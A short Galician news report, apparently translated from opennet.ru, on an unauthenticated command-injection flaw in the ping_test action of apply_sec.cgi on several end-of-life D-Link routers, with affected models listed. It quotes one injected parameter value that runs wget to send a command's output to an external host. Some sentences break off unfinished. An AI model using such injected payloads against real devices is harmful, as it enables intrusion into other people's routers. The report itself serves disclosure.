Nos enrutadores sen fíos D-Link
Curiosamente, segundo os desenvolvedores do firmware, a chamada "ping_test" debe executarse só despois da autenticación, pero en realidade chámase en calquera caso, independentemente de iniciar sesión na interface web. En particular, ao acceder ao script apply_sec.cgi e pasar o parámetro "action=ping_test", o script redirixe á páxina de autenticación, pero ao mesmo tempo realiza a acción asociada a ping_test. Para executar o código, utilizouse outra vulnerabilidade no propio ping_test, que chama á utilidade ping sen comprobar correctamente a corrección do enderezo IP enviado para a proba. Por exemplo, para chamar á utilidade wget e transferir os resultados do comando "echo 1234" a un host externo, só tes que especificar o parámetro "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://". test.test/?$( echo 1234)".
A presenza da vulnerabilidade confirmouse oficialmente nos seguintes modelos:
- DIR-655 con firmware 3.02b05 ou anterior;
- DIR-866L con firmware 1.03b04 ou anterior;
- DIR-1565 con firmware 1.01 ou anterior;
- DIR-652 (non se proporciona información sobre versións de firmware problemáticas)
O período de soporte para estes modelos xa caducou, polo que D-Link
Máis tarde descubriuse que a vulnerabilidade tamén o estaba
Fonte: opennet.ru